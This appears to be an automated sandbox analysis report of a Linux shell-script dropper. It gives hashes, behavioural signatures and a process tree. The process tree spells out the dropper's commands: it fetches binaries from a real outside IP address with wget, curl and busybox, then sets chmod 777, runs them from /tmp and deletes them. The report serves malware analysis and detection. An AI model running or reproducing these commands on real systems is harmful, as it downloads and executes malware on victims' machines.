Analysis
-
max time kernel
61s -
max time network
59s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
-
Size
10KB
-
MD5
8831ac149f5712a653b2ed7d4a827e57
-
SHA1
e48119cbe7dcbf516620e6b82c96350ecb491554
-
SHA256
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd
-
SHA512
368cdcd017b026288093ca2a837a48c67cee319efbe80778a1a7c80f7206446b4944f3ade0ba0e8bfa35bc140fc293621629cd99e3e8e54e7226c2598122500f
-
SSDEEP
96:HMMfw0o7MQoiYo7XjoP3uZJs/CqDyu7hlQdddimXhGXhaXh+WXhyXhCXhnEQyhlT:MAmyjhlQdddiGmSHqaGhlQddtmSHqalu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 827 chmod 884 chmod 974 chmod 926 chmod 758 chmod 797 chmod 836 chmod 896 chmod 950 chmod 821 chmod 920 chmod 956 chmod 752 chmod 908 chmod 986 chmod 962 chmod 968 chmod 902 chmod 878 chmod 890 chmod 746 chmod 872 chmod 932 chmod 944 chmod 980 chmod 773 chmod 914 chmod 938 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 747 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 753 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 759 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 775 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 799 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 822 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 828 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 838 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 873 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 879 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 885 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 891 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 897 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 903 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 909 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 915 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 921 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 927 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 933 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 939 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 945 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 951 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 957 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 963 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 969 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 975 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 981 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 987 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl
Processes
-
/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh1⤵PID:713
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:743
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:751
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:757
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:769
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:773
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:793
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:819
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:826
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:832
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:870
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:877
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:883
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:889
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:895
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:901
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:907
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:913
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:919
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:925
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:931
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:937
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:943
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:949
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:950
-
-
